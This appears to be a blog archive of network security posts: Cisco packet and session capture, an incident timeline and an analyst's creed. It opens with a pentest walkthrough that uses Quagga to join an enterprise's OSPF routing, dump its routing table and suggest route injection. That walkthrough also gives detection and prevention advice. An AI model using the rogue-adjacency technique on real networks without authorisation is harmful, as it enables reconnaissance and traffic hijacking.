Archive for the NSM Category

Cap’n Quagga’s Pirate Treasure Map

Posted in Cisco, Networking, NSM on 23 November, 2010 by Alec Waters

Avast, me hearties! When a swashbucklin’ pirate sights land whilst sailin’ uncharted waters, the first thing he be doin’ is makin’ a map. Ye can’t be burying ye treasure if ye don’t have a map, yarrr!

PUBLIC SERVICE ANNOUNCEMENT

For everyone’s sanity, the pirate speak ends now. Save it for TLAP day!

When searching for booty on a network, it’s often useful to have a map. If you’ve got a foothold during a pentest, for example, how far does your conquered domain stretch? Is it a single-subnet site behind a SOHO router, or a tiny outpost of a corporate empire spanning several countries?

To get the answer, the best thing to do is ask one of the locals. In this case, we’re going to try to convince a helpful router to give up the goods and tell us what the network looks like. The control plane within the enterprise’s routers contains the routing table, which is essentially a list of destination prefixes (i.e., IP networks) and the next-hop to be used to get there (i.e., which neighbouring router to pass traffic on to in order to reach a destination).

The routing table is populated by a routing protocol (such as BGP, OSPF, EIGRP, RIP, etc), which may in turn have many internal tables and data structures of its own. Interior routing protocols (like OSPF) are concerned with finding the “best” route from A to B within the enterprise using a “technical” perspective; they’re concerned with automatically finding the “shortest” and “fastest” route, as opposed to exterior routing protocols like BGP which are more interested in implementing human-written traffic forwarding policies between different organisations.

The key word above automatic. Interior routing protocols like to discover new neighbouring routers without intervention – it can therefore cater for failed routers that come back online, and allow the network to grow and have the “best” paths recomputed automatically.

So, how are we going to get our treasure map so that we know how far we can explore? We’re going to call in Cap’n Quagga!

Technically, it's James the Pirate Zebra, but seriously man, you try finding a picture of a pirate quagga!! They're extinct, for starters!

Pirate Cap'n Quagga aboard his ship, "Ye Stripy Scallywag"

Quagga is a software implementation of a handful of routing protocols. We’re going to use it to convince the local router that we’re a new member of the pirate fleet, upon which the router will form a neighbour relationship with us. After this has happened we’ll end up with our pirate treasure map, namely the enterprise’s routing table. Finally, we’ll look at ways in which the corporate privateers can detect Cap’n Quagga, and ways to prevent his buckle from swashing in the first place.

For the purposes of this article we’re going to use OSPF, but the principles hold for other protocols too. OSPF is quite a beast, and full discussion of the protocol is well beyond the scope of this article – interested parties should pick up a book.

Step One – Installing and configuring Quagga

I’m using Debian, so ‘apt-get install quagga’ will do the job quite nicely. Once installed, we need to tweak a few files:

/etc/quagga/daemons

This file controls which routing protocols will run. We’re interested only in OSPF for this example, so we can edit it as follows:

zebra=yes
bgpd=no
ospfd=yes
ospf6d=no
ripd=no
ripngd=no

As shown above, we need to turn on the zebra daemon too – ospfd can’t stand alone.

Next, we need to set up some basic config files for zebra and ospfd:

/etc/quagga/zebra.conf

hostname pentest-zebra
password quagga
enable password quagga

/etc/quagga/ospfd.conf

hostname pentest
password quagga
enable password quagga
log stdout

Now we can force a restart of Quagga with ‘/etc/init.d/quagga restart’.

For more information, the Quagga documentation is here, the wiki is here, and there’s a great tutorial here.

Step Two – Climb the rigging to the crow’s nest and get out ye spyglass

We need to work out if there’s a router on the local subnet that’s running OSPF. This step is straightforward, as OSPF sends out multicast “Hello” packets by default every ten seconds – all we have to do is listen for it. As far as capturing this traffic goes, it has a few distinguishing features:

  • The destination IP address is 224.0.0.5, the reserved AllSPFRouters multicast address
  • The IP datagrams have a TTL of one, ensuring that the multicast scope is link local only
  • OSPF does not ride inside TCP or UDP – it has its own IP Protocol number, 89.

The easiest capture filter for tshark/tethereal or their GUI equivalents is simply “ip proto 89”; this will capture OSPF hellos in short order:

Ahoy there, matey!

Apart from confirming the presence of a local OSPF router, this information is critical in establishing the next step on our journey to plunderville – we need Quagga’s simulated router to form a special kind of neighbour relationship with the real router called an “adjacency”. Only once an adjacency has formed will routing information be exchanged. Fortunately, everything we need to know is in the hello packet:

Ye're flying my colours, matey!

For a text only environment, “tshark -i eth0 -f ‘ip proto 89’ -V” provides similar output.

Step Three – configure Quagga’s OSPF daemon

For an adjacency to form (which will allow the exchange of LSAs, which will allow us to populate the OSPF database, which will allow us to run the SPF algorithm, which will allow us to populate the local IP routing table…), we need to configure Quagga so that all of the highlighted parameters above match. The command syntax is very Cisco-esque, and supports context sensitive help, abbreviated commands and tab completion. I’m showing the full commands here, but you can abbreviate as necessary:

# telnet localhost ospfd
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.

Hello, this is Quagga (version 0.99.17).
Copyright 1996-2005 Kunihiro Ishiguro, et al.

User Access Verification

Password:
pentest> enable
Password:
pentest# configure terminal
pentest(config)# interface eth0
! Make the hello and dead intervals match what we’ve captured
pentest(config-if)# ospf hello-interval 10
pentest(config-if)# ospf dead-interval 40
pentest(config-if)# exit
pentest(config)# router ospf
! eth0 on this machine was given 192.168.88.49 by DHCP
! The command below will put any interfaces in
! 192.168.88.0/24 into area 0.0.0.4, effectively
! therefore “turning on” OSPF on eth0
! The area id can be specified as an integer (4) or
! as a dotted quad (0.0.0.4)
pentest(config-router)# network 192.168.88.0/24 area 0.0.0.4
pentest(config-router)# exit
pentest(config)# exit

We can check our work by looking at the running-config:

pentest# show running-config

Current configuration:
!
hostname pentest
password quagga
enable password quagga
log stdout
!
!
!
interface eth0
!
interface lo
!
router ospf
network 192.168.88.0/24 area 0.0.0.4
!
line vty
!
end

The Hello and Dead intervals of 10 and 40 are the defaults, which is why they don’t show in the running-config under ‘interface eth0’.

Step Four – Start diggin’, matey!

With a bit of luck, we’ll have formed an OSPF adjacency with the local router:

pentest# show ip ospf neighbor

Neighbor ID Pri  State    Dead Time Address        Interface
172.16.7.6   1  Full/DR  32.051s   192.168.88.1 eth0:192.168.88.49

If we exit from Quagga’s OSPF daemon and connect to zebra instead, we can look at our shiny new routing table. Routes learned via OSPF are prefixed with O:

# telnet localhost zebra
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.

Hello, this is Quagga (version 0.99.17).
Copyright 1996-2005 Kunihiro Ishiguro, et al.

User Access Verification

Password:
pentest-zebra> show ip route
Codes: K – kernel route, C – connected, S – static, R – RIP, O – OSPF,
I – ISIS, B – BGP, > – selected route, * – FIB route

O   0.0.0.0/0 [110/1] via 192.168.88.1, eth0, 00:04:45
K>* 0.0.0.0/0 via 192.168.88.1, eth0
O>* 10.4.0.0/26 [110/1012] via 192.168.88.1, eth0, 00:04:46
O>* 10.4.0.64/26 [110/1012] via 192.168.88.1, eth0, 00:04:46
O>* 10.4.0.128/26 [110/1012] via 192.168.88.1, eth0, 00:04:46
O>* 10.4.0.192/26 [110/1012] via 192.168.88.1, eth0, 00:04:46
O>* 10.4.2.0/26 [110/1012] via 192.168.88.1, eth0, 00:04:46
O>* 10.4.3.0/26 [110/1012] via 192.168.88.1, eth0, 00:04:46
O>* 172.16.6.0/30 [110/15] via 192.168.88.1, eth0, 00:04:46
O>* 172.16.6.4/30 [110/16] via 192.168.88.1, eth0, 00:04:46
O>* 172.16.6.8/30 [110/11] via 192.168.88.1, eth0, 00:04:46
O>* 172.16.6.12/30 [110/110] via 192.168.88.1, eth0, 00:04:46
O>* 172.16.7.1/32 [110/12] via 192.168.88.1, eth0, 00:04:46
O>* 172.16.7.2/32 [110/13] via 192.168.88.1, eth0, 00:04:46
O>* 172.16.7.3/32 [110/16] via 192.168.88.1, eth0, 00:04:46
O>* 172.16.7.4/32 [110/1012] via 192.168.88.1, eth0, 00:04:46
O>* 172.16.7.5/32 [110/1012] via 192.168.88.1, eth0, 00:04:46

We clearly are not just sitting on a single-subnet LAN! Here are some of the things we can learn from the routing table:

  • Firstly, we’ve got a few more subnets than merely the local one to enumerate with nmap etc!
  • We can make some kind of estimation on how far away the subnets are by looking at the route metrics. An example above is the ‘1012’ part of ‘[110/1012]’. 1012 is the metric for the route, with the precise meaning of “metric” varying from routing protocol to routing protocol. In the case of OSPF, by default this is the sum of the interface costs between here and the destination, where the interface cost is derived from the interface’s speed. The 110 part denotes the OSPF protocol’s “administrative distance“, which is a measure of trustworthiness of a route offered for inclusion in the routing table by a given routing protocol. If two protocols offer the routing table exactly the same prefix (10.4.3.0/26, for example), the routing protocol with the lowest AD will “win”.
  • A good number of these routes have a prefix length of /26 (i.e., a subnet mask of 255.255.255.192), meaning that they represent 64 IP addresses. These are likely to be host subnets with new victims on them.
  • The /30 routes (4 IP addresses) are likely to be point-to-point links between routers or even WAN or VPN links between sites.
  • The /32 routes (just one IP address) are going to be loopback addresses on individual routers. If you want to target infrastructure directly, these are the ones to go for.

If you want to start digging really deeply, you can look at the OSPF database (show ip ospf database), but that’s waaay out of scope for now.

Step Five – Prepare a broadside!

If we’ve got to this point, we are in a position not only to conduct reconnaissance, but we could also start injecting routes into their routing table or manipulate the prefixes already present in an effort to redirect traffic to us (or to a blackhole). Originating a default route is always fun, since it will take precedence over legitimate static default routes that have been redistributed into OSPF (redistributed routes are “External” in OSPF terminology, and are less preferable to “internal” routes such as our fraudulent default). If we had a working default route of our own, this approach could potentially redirect Internet traffic for the entire enterprise through our Quagga node where we can capture it. Either that or you’ll bring the network to a screaming halt.

Anyway, it’s all moot, since we’re nice pirates and would never consider doing anything like that!

Privateers off the starboard bow, Cap’n!

How can we detect such naughtiness, and even better, prevent it?

The first step is to use the OSPF command ‘log-adjacency-changes’ on all the enterprise’s OSPF routers. This will leave log messages like this:

Nov 23 15:11:24.666 UTC: %OSPF-5-ADJCHG: Process 2, Nbr 192.168.88.49 on Gi­gabitEthernet0/0.2 from LOADING to FULL, Loading Done

Keeping track of adjacency changes is an excellent idea – it’s a metric of the stability of the network, and also offers clues when rogue devices form adjacencies.

Stopping rogue adjacencies altogether can be accomplished in two ways. The first is to make OSPF interfaces on host-only subnets “passive“, which permits them to participate in OSPF without allowing adjacencies to form.

The second method is to use OSPF authentication, whereby a hash of a preshared key is required before an adjacency can be established. Either method is strongly recommended!

As always, keep yer eyes to the horizon, mateys! 🙂


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

The Analyst’s Creed

Posted in NSM on 2 November, 2010 by Alec Waters

These are my logfiles. There are many like them, but these ones are mine. My logfiles are my best friends. They are my life. I must master them as I must master my life. My logfiles, without me, are useless. Without my logfiles, I am useless. I must comprehend my logfiles’ every word. I must be more vigilant than my enemy who is trying to invade me. I must detect him before he compromises me.

I will…

My network and myself know that what counts in this war is not the products we buy, nor the number of our certifications. We know that it is the detections and investigations that count.

We will detect and investigate…

My network is human, even as I, because it is my life. Thus, I will learn it as a brother. I will learn its weaknesses, its strength, its parts, its accessories, its services and its users. I will assume nothing and verify everything. I will ever guard it against the ravages of opportunistic attack and determined infiltration as I will ever guard my legs, my arms, my eyes and my heart against damage. I will keep my CSIRT trained and ready. We will become part of each other.

We will…

Before $Deity, I swear this creed. My logfiles and myself are the defenders of my enterprise. We are the masters of our enemy. We are the saviors of my life. So be it, until victory is ours and there is no enemy, but peace!

Adapted from the Rifleman’s Creed.


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

The Cisco Kid and the Great Packet Roundup, part two – session data

Posted in Cisco, General Security, NSM on 26 October, 2010 by Alec Waters

In part one, I covered how to use Cisco routers and firewalls to perform full packet capture. This exciting installment will cover how to get network session data out of these devices.

Network session data can be likened to a real-world itemised telephone bill. It tells you who “called” who, at what times, for how long, and how much was said (but not what was said). It’s an excellent lightweight way to see what’s going on armed only with a command prompt.

There are several ways to extract such information from Cisco kit; we’ll look at each in turn, following Part One’s support/troubleshooting/IR scenario of accessing remote devices where you’re not able to make topological changes or install any extra software or hardware.

Netflow

The richest source of session information on Cisco devices is Netflow (I’ll leave it to Cisco to explain how to turn it on). If you’re able to set up a Netflow collector/analyser (like this one (free for two-interface routers), or many others) you can drill down into your session info as far as you like. If you haven’t got an analyser or you can’t install one in time of need, it’s still worth switching on Netflow because you can interrogate the flow cache from the command line.

The command is “show ip cache flow”, and the output is split into two parts. The first shows some statistical information about the flows that the router has observed:

router#sh ip cache flow
IP packet size distribution (3279685 total packets):
 1-32   64   96  128  160  192  224  256  288  320  352  384  416  448  480
 .000 .184 .182 .052 .072 .107 .004 .005 .000 .000 .000 .000 .000 .000 .000

 512  544  576 1024 1536 2048 2560 3072 3584 4096 4608
 .000 .000 .001 .020 .365 .000 .000 .000 .000 .000 .000

IP Flow Switching Cache, 278544 bytes
 57 active, 4039 inactive, 418030 added
 10157020 ager polls, 0 flow alloc failures
 Active flows timeout in 1 minutes
 Inactive flows timeout in 15 seconds
IP Sub Flow Cache, 34056 bytes
 57 active, 967 inactive, 418030 added, 418030 added to flow
 0 alloc failures, 0 force free
 1 chunk, 1 chunk added
 last clearing of statistics never
Protocol     Total    Flows   Packets Bytes  Packets Active(Sec) Idle(Sec)
--------     Flows     /Sec     /Flow  /Pkt     /Sec     /Flow     /Flow
TCP-WWW       6563      0.0       186  1319      1.2       4.7       1.4
TCP-other    16163      0.0         1    47      0.0       0.0      15.4
UDP-DNS         12      0.0         1    67      0.0       0.0      15.6
UDP-NTP       1010      0.0         1    76      0.0       0.0      15.0
UDP-Frag         2      0.0         6   710      0.0       0.2      15.3
UDP-other   316602      0.3         2   156      0.8       0.6      15.4
ICMP         31165      0.0         6    63      0.2      53.4       2.2
IP-other     46438      0.0        21   125      1.0      58.0       2.1
Total:      417955      0.4         7   574      3.3      11.0      12.7

In absence of a graphical Netflow analyser, the Packets/Sec counter is a good barometer of what’s “using up all the bandwidth”. To clear the stats so that you can establish a baseline, you can use the command “clear ip flow stats”.

After the stats comes a listing of all the flows currently being tracked by the router:

SrcIf     SrcIPaddress    DstIf     DstIPaddress    Pr SrcP DstP  Pkts
Fa4       xxx.xxx.xxx.xxx Local     yyy.yyy.yyy.yyy 32 3FAF 037C    16
Tu100     10.7.1.250      BV3       10.4.1.3        06 0051 C07A   663
Tu100     10.7.1.250      BV3       10.4.1.3        06 0050 C0AC   120
BV3       10.4.1.3        Tu100     10.7.1.250      06 C0AC 0050   116
Tu100     192.168.88.20   Local     172.16.7.10     01 0000 0800     5
BV3       10.4.1.3        Fa4       zzz.zzz.zzz.zzz 06 C0A2 0050   429
BV3       10.4.1.3        Tu100     10.7.1.250      06 C07A 0051   366
Fa4       bbb.bbb.bbb.bbb BV3       yyy.yyy.yyy.yyy 06 0050 C0A0     1
BV3       10.4.1.3        Fa4       ddd.ddd.ddd.ddd 06 C07E 0050     1
Tu100     192.168.88.56   Local     172.16.7.10     06 8081 0016     7
Fa4       zzz.zzz.zzz.zzz BV3       yyy.yyy.yyy.yyy 06 0050 C0A2   763
Tu100     192.168.88.28   Local     172.16.7.10     11 04AC 00A1     1
Tu100     192.168.88.28   Local     172.16.7.10     11 04A6 00A1     1
Fa4       aaa.aaa.aaa.aaa Local     yyy.yyy.yyy.yyy 32 275F BD8A     5
Fa4       ccc.ccc.ccc.ccc Local     yyy.yyy.yyy.yyy 32 97F1 E9BE     5
Tu100     10.7.1.242      Local     172.16.7.10     01 0000 0000     3
Fa4       ddd.ddd.ddd.ddd BV3       yyy.yyy.yyy.yyy 06 0050 C07E     1

The tempting simplicity of the table above hides a plethora of gotchas for the unwary:

  • The Pr (IP protocol number),  SrcP (source port) and DstP columns are in hex, but we can all do the conversion in our heads, right? 😉
  • Netflow is a unidirectional technology. That means that if hosts A and B are talking to one another via a single TCP connection, two flows will be logged – one for A->B and one for B->A. For example, these two rows in the table above are talking about the same TCP session (the four-tuple of addresses and ports is the same for both rows):
Tu100     10.7.1.250      BV3       10.4.1.3        06 0051 C07A   663
BV3       10.4.1.3        Tu100     10.7.1.250      06 C07A 0051   366
  • Unless you configure it otherwise, Netflow is an ingress technology. This means that flows are accounted for as they enter the router, not as they leave. You can determine what happens on the egress side of things because when a flow is accounted for the output interface is determined by a FIB lookup and placed in the DstIf column; in this way, you can track a flow’s path through the router. I mention this explicitly because…
  • Netflow does not sit well with NAT. Take a look at these two rows, which represent an HTTP download (port 0x0050 is 80 in decimal) requested of non-local server zzz.zzz.zzz.zzz by client 10.4.1.3:
BV3       10.4.1.3        Fa4       zzz.zzz.zzz.zzz 06 C0A2 0050   429
Fa4       zzz.zzz.zzz.zzz BV3       yyy.yyy.yyy.yyy 06 0050 C0A2   763

So what’s yyy.yyy.yyy.yyy, then? It’s the NAT inside global address representing 10.4.1.3. As Netflow is unidirectional and is recorded as it enters an interface, the returning traffic from zzz.zzz.zzz.zzz will have the post-NAT yyy.yyy.yyy.yyy as its destination address, and will be recorded as such.

Provided that you keep that lot in mind, the flow cache is a powerful tool to explore the traffic your router is handling.

NAT translations

A typical border router may well perform NAT/PAT tasks. If so, you can use the NAT database as a source of session information. On a router, the command is “show ip nat translations [verbose]”; on a PIX/ASA, it’s “show xlate [debug]”:

router#show ip nat translations
Pro Inside global         Inside local   Outside local    Outside global
tcp yyy.yyy.yyy.yyy:49314 10.4.1.3:49314 94.42.37.14:80   94.42.37.14:80
tcp yyy.yyy.yyy.yyy:49316 10.4.1.3:49316 92.123.68.49:80  92.123.68.49:80

If you’ve got a worm on your network that’s desperately trying to spread, chances are you’ll see a ton of NAT translations (which could overwhelm a small router). Rather than paging through thousands of lines of output, you can just ask the device for some NAT statistics. On a router, it’s “show ip nat statistics”; on a PIX/ASA, it’s “show xlate count”.

Keeping tabs on the number of active NAT translations is a worthwhile thing to do. I wrote a story for Security Monkey’s blog a while back which tells the tale of a worm exhausting a router’s memory with NAT translations; you can even graph the number of translations to look for anomalies over time.

Firewall sessions

Another way of extracting session information is to ask the router or PIX about the sessions it is currently tracking for firewall purposes. On a router it’s “show ip inspect sessions [detail]”; on the PIX/ASA, it’s “show conn [detail]”.

router#show ip inspect sessions detail
Established Sessions
 Session 842064A4 (10.4.1.3:49446)=>(92.123.68.81:80) http SIS_OPEN
  Created 00:00:59, Last heard 00:00:58
  Bytes sent (initiator:responder) [440:4269]
  In  SID 92.123.68.81[80:80]=>y.y.y.y[49446:49446] on ACL outside-fw (6 matches)
 Session 84206FC4 (10.4.1.3:49443)=>(92.123.68.81:80) http SIS_OPEN
  Created 00:00:59, Last heard 00:00:59
  Bytes sent (initiator:responder) [440:2121]
  In  SID 92.123.68.81[80:80]=>y.y.y.y[49443:49443] on ACL outside-fw (4 matches)
 Session 8420728C (10.4.1.3:49436)=>(92.123.68.81:80) http SIS_OPEN
  Created 00:01:01, Last heard 00:00:50
  Bytes sent (initiator:responder) [1343:48649]
  In  SID 92.123.68.81[80:80]=>y.y.y.y[49436:49436] on ACL outside-fw (44 matches)

This has the advantage of not being complicated by NAT, but still showing useful bytecounts and session durations.

Last resorts

If none of the above can help you out, there are a couple of last resort options open to you. The first of these is the “ip accounting” interface configuration command on IOS routers. To quote Cisco:

The ip accounting command records the number of bytes (IP header and data) and packets switched through the system on a source and destination IP address basis. Only transit IP traffic is measured and only on an outbound basis; traffic generated by the router access server or terminating in this device is not included in the accounting statistics. Traffic coming from a remote site and transiting through a router is also recorded.

Also note that this command will likely have a performance impact on the router. You may end up causing more problems than you solve by using this! The output of “show ip accounting” will look something like this:

router# show ip accounting
 Source          Destination            Packets      Bytes
 172.16.19.40    192.168.67.20          7            306
 172.16.13.55    192.168.67.20          67           2749
 172.16.2.50     192.168.33.51          17           1111
 172.16.2.50     172.31.2.1             5            319
 172.16.2.50     172.31.1.2             463          30991
 172.16.19.40    172.16.2.1             4            262

If “ip accounting” was a last resort, “debug ip packet” is what you’d use as an even lasterer resort, so much so that I leave it as an exercise for the reader to find out all about it. Don’t blame me when your router chokes to the extent that you can’t even enter “undebug all”…!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

The Cisco Kid and the Great Packet Roundup, part one

Posted in Cisco, General Security, NSM on 11 August, 2010 by Alec Waters

Knowing what your network is doing is central to the NSM doctrine, and the usual method of collecting NSM data is to attach a sensor of some kind to a tap or a span port on a switch.

But what if you can’t do this? What if you need to see what’s going on on a network that’s geographically remote and/or unprepared for conventional layer-2 capture? Quite a bit, as it turns out.

In the first of a two-part post, the Cisco Kid (i.e., me) is going to walk you through a number of ways to use an IOS router or ASA/PIX firewall to perform full packet capture. The two product sets have different capabilities and limitations, so we’ll look at each in turn.

PIX/ASA

Full packet capture has been supported on these devices for many years, and it’s quite simple to operate. Step one is to create an ACL that defines the traffic we’re interested in capturing – because all of the captures are stored in memory, we need to be as specific as we can otherwise we’ll be using scarce RAM to capture stuff we don’t care about.

Let’s assume we’re interested in POP3 traffic. Start by defining an ACL like this:

pix(config)# access-list temp-pop3-acl permit tcp any eq 110 any
pix(config)# access-list temp-pop3-acl permit tcp any any eq 110

Note that we’ve specified port 110 as the source or the destination – we wouldn’t want to risk only capturing one side of the conversation.

Now we can fire up the capture, part of which involves specifying the size of the capture buffer. Remembering that this will live in main memory, we’d better have a quick check to see how much is going spare:

pix# show memory
Free memory:        31958528 bytes (34%)
Used memory:        60876368 bytes (66%)
Total memory:       92834896 bytes (100%)

Plenty, in this case. Let’s start the capture:

pix# capture temp-pop3-cap access-list temp-pop3-acl buffer 1024000 packet-length 1514 interface outside-if circular-buffer

This command gives us a capture called temp-pop3-cap, filtered using our ACL, stored in a one-meg (circular) memory buffer, that will capture frames of up to 1514 bytes in size from the interface called outside-if. If you don’t specify a packet-length, you won’t end up capturing entire frames.

Now we can check that we’re actually capturing stuff:

pix# show capture temp-pop3-cap
5 packets captured
1: 12:22:02.410440 xxx.xxx.xxx.xxx.39032 > yyy.yyy.yyy.yyy.110: S 3534424301:3534424301(0) win 65535 <mss 1260,nop,nop,sackOK>
2: 12:22:02.411401 yyy.yyy.yyy.yyy.110 > xxx.xxx.xxx.xxx.39032: S 621655548:621655548(0) ack 3534424302 win 16384 <mss 1380,nop,nop,sackOK>
3: 12:22:02.424691 xxx.xxx.xxx.xxx.39032 > yyy.yyy.yyy.yyy.110: . ack 621655549 win 65535
4: 12:22:02.425515 yyy.yyy.yyy.yyy.110 > xxx.xxx.xxx.xxx.39032: P 621655549:621655604(55) ack 3534424302 win 65535
5: 12:22:02.437462 xxx.xxx.xxx.xxx.39032 > yyy.yyy.yyy.yyy.110: P 3534424302:3534424308(6) ack 621655604 win 65480

To get the capture off the box and into Wireshark, point your web browser at the PIX/ASA like this, specifying the capture’s name in the URL:

https://yourpix/admin/capture/temp-pop3-cap/pcap

Don’t forget the /pcap on the end, or you’ll end up downloading only the output of the ‘show capture temp-pop3-cap’ command.

To clean up, you can use the ‘clear capture’ command to empty the capture buffer (but still keep on capturing) and the ‘no capture’ command to destroy the buffer and stop capturing altogether.

Provided one is careful with the size of the capture buffer, it’s nice and easy, it works, and it’s quick to implement in an emergency. If you’re using the ASDM GUI, Cisco have a how-to here that will walk you through the process.

IOS routers

As we’ll see, things aren’t quite as nice in IOS land, but there’s still useful stuff we can do. As of 12.4(20)T, IOS supports the Embedded Packet Capture feature (EPC) which at first glance seems to be equivalent to the PIX/ASA’s capture feature. Again, we’ll start by creating an ACL for capturing POP3 traffic:

router(config)#ip access-list extended temp-pop3-acl
router(config-ext-nacl)#permit tcp any eq 110 any
router(config-ext-nacl)#permit tcp any any eq 110

Now we can set up the capture. This involves two steps, setting up a capture buffer (where to store the capture) and a capture point (where to capture from). The capture buffer is set up like this:

router#monitor capture buffer temp-pop3-buffer size 512 max-size 1024 circular

Here is where Cisco seem to have missed a trick. The ‘size’ parameter refers to the buffer size in kilobytes, and 512 is the maximum. That’s “Why???” #1 – 512KB seems like a very low limit to place on a capture buffer. “Why???” #2 is the ‘max-size’ parameter, which refers to the amount of bytes in each frame that will be captured; 1024 is the maximum, well below ethernet’s 1500 byte MTU. So we seem to be limited in that we can capture only a small amount of incomplete frames, which isn’t really in the spirit of “full” packet capture…

Sighing deeply, we move on to setting up the buffer’s filter using our ACL:

router#monitor capture buffer temp-pop3-buffer filter access-list temp-pop3-acl

Next, we create a capture point. This specifies where the frames will be captured, both from an interface and an IOS architecture point of view:

router#monitor capture point ip cef temp-pop3-point GigabitEthernet0/0.2 both

‘ip cef’ means we’re interested in capturing CEF-switched frames as opposed to process-switched ones, so if traffic you’re expecting to see in the buffer isn’t there it could be that the router process switched it thus avoiding the capture point. The capture interface is specified, as is ‘both’ which means we’re interested in ingress and egress traffic.

Next (we’re almost there) we have to associate a buffer with a capture point:

router#monitor capture point associate temp-pop3-point temp-pop3-buffer

Now we can check our work before we start the capture:

router#show monitor capture buffer temp-pop3-buffer parameters
Capture buffer temp-pop3-buffer (circular buffer)
Buffer Size : 524288 bytes, Max Element Size : 1024 bytes, Packets : 0
Allow-nth-pak : 0, Duration : 0 (seconds), Max packets : 0, pps : 0
Associated Capture Points:
Name : temp-pop3-point, Status : Inactive
Configuration:
monitor capture buffer temp-pop3-buffer size 512 max-size 1024 circular
monitor capture point associate temp-pop3-point temp-pop3-buffer
monitor capture buffer temp-pop3-buffer filter access-list temp-pop3-acl

router#sh monitor capture point temp-pop3-point
Status Information for Capture Point temp-pop3-point
IPv4 CEF
Switch Path: IPv4 CEF            , Capture Buffer: temp-pop3-buffer
Status : Inactive
Configuration:
monitor capture point ip cef temp-pop3-point GigabitEthernet0/0.2 both

Start the capture:

router#monitor capture point start temp-pop3-point

And make sure we’re capturing stuff:

router#show monitor capture buffer temp-pop3-buffer dump
<frame by frame raw dump snipped>

When we’re done, we can stop the capture:

router#monitor capture point stop temp-pop3-point

And finally, we can export it off the box for analysis:

router#monitor capture buffer temp-pop3-buffer export tftp://10.1.8.6/temp-pop3.pcap

…and for all that work, we’ve ended up with a tiny pcap containing truncated frames. Better than nothing though!

However, there is a second option for IOS devices, provided that you have a capture workstation that’s on a directly attached ethernet subnet. It’s called Router IP Traffic Export (RITE), and will copy nominated packets and send them off-box to a workstation running Wireshark or similar (or an IDS, etc.). Captures therefore do not end up in a memory buffer, and it is the responsibility of the workstation to capture the exported packets and to work out which packets were actually exported from the router and which are those sent or received by the workstation itself.

After carefully reading the restrictions and caveats in the documentation, we can start by setting up a RITE profile. This defines what we’re going to monitor, and where we’re going to export the copied packets:

router#ip traffic-export profile temp-pop3-profile
# Set the capture filter
router(conf-rite)#incoming access-list temp-pop3-acl
router(conf-rite)#outgoing access-list temp-pop3-acl
# Specify that we want to capture ingress and egress traffic
router(conf-rite)#bidirectional
# The capture workstation lives on the subnet attached to Gi0/0.2
router(conf-rite)#interface GigabitEthernet 0/0.2
# And the workstation’s MAC address is:
router(conf-rite)#mac-address hhhh.hhhh.hhhh

Finally, we apply the profile to the interface from which we actually want to capture packets:

router(config)#interface GigabitEthernet 0/0.2
router(config-subif)#ip traffic-export apply temp-pop3-profile

If all’s gone well, the capture workstation on hhhh.hhhh.hhhh should start seeing a flow of POP3 traffic. We can ask the router how it’s getting on, too:

router#show ip traffic-export
Router IP Traffic Export Parameters
Monitored Interface         GigabitEthernet0/0
Export Interface                GigabitEthernet0/0.2
Destination MAC address hhhh.hhhh.hhhh
bi-directional traffic export is on
Output IP Traffic Export Information    Packets/Bytes Exported    19/1134

Packets Dropped           17877
Sampling Rate                one-in-every 1 packets
Access List                      temp-pop3-acl [named extended IP]

Input IP Traffic Export Information     Packets/Bytes Exported    27/1169

Packets Dropped           12153
Sampling Rate                one-in-every 1 packets
Access List                      temp-pop3-acl [named extended IP]

Profile temp-pop3-profile is Active

You get full packets captured (note packets, not frames – the encapsulating Ethernet frame isn’t the same as the original, in that it has the router’s MAC address as the source and the capture workstation’s MAC address as the destination), and provided you’re local to the router and can afford the potential performance hit on the box, it’s quite a neat way to perform an inline capture. Furthermore, this may be your only capturing option sometimes – granted, the capture workstation has to be on a local ethernet segment, but the traffic profile itself can be applied to other kinds of circuit for which you may not have a tap (ATM, synchronous serial, etc.). It’s a very useful tool.

In the next exciting installment, the Cisco Kid will look at ways of extracting network session information from IOS routers, PIXes and ASAs.


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

Private Investigations

Posted in Case Studies, General Security, Malware, NSM, Why watch the wire? on 25 May, 2010 by Alec Waters

The following is a sanitised excerpt from an after action report on a malware infection. Like the song this post is named after, the report goes all the way from “It’s a mystery to me” to “What have you got to take away?”. The report is in two parts:

  • Firstly, a timeline of events that was constructed from the various forms of log and network flow data that are routinely collected. Although not explicitly cited in this report, evidence exists to back up all of the items in the timeline
  • The second part is an analysis of the cause of all the mischief

To set the scene, the mystery to be unraveled concerned two machines on an enterprise network which reported that they had detected and removed malware. Detected and removed? Case closed, surely? Never ones to let a malware detection go uninvestigated, we dig deeper…

Part One – Timeline of events

Unknown time, likely shortly before 08:12:37 BST
Ian Oswald attaches a USB stick to his computer. $AV_VENDOR does nothing, either because it detects no threat or because it isn’t working properly. The last message from $AV_VENDOR on Ian’s machine to $AV_MANAGEMENT_SERVER was on 30th January 2009, suggesting the latter is the case.

Based upon subsequent activity, malware is active on Ian’s machine at this point, and is running under his Windows account as a Domain Administrator. The potential for mischief is therefore largely unconstrained.

08:12:37 BST
Ian’s machine ($ATTACKER) requests the URL:

http://www.whatismyip.com/automation/n09230945.asp

This returns a page containing the outside global IP address of Ian’s machine (i.e., the IP address it will appear to have when communicating with hosts on the Internet).

Something on Ian’s machine now knows “where it is” on the Internet.

It is likely that the inside local IP address of Ian’s machine (192.168.1.11) is also determined at this point, so something on Ian’s machine also knows “where it is” within the enterprise.

08:12:39 BST
Ian’s machine requests the URL:

http://geoloc.daigu­o.com/?self

This is a geolocation site, and returns the string containing a country code.

Something on Ian’s machine now knows “where it is” geographically.

08:12:56 BST
Ian’s machine attempts to download a hostile executable. This download is blocked by $URLFILTER, which is fortunate because at the time the executable was not detected as a threat by $AV_VENDOR.

NOTE – Subsequent analysis of the executable confirms its hostile nature; detailed discussion is out of the scope of this report, but a command and control channel was observed, and steganographic techniques were used to conceal the download of further malware by hiding an obfuscated executable in the Comments extension header of a gif file.

NOTE – It was not known until later in the investigation if Ian’s machine already knew where to download the executable from, or if a command and control channel was involved. Ian’s machine was running Skype at the time, which produces sufficient network noise to occlude such a channel when only network session information is available to the investigator.

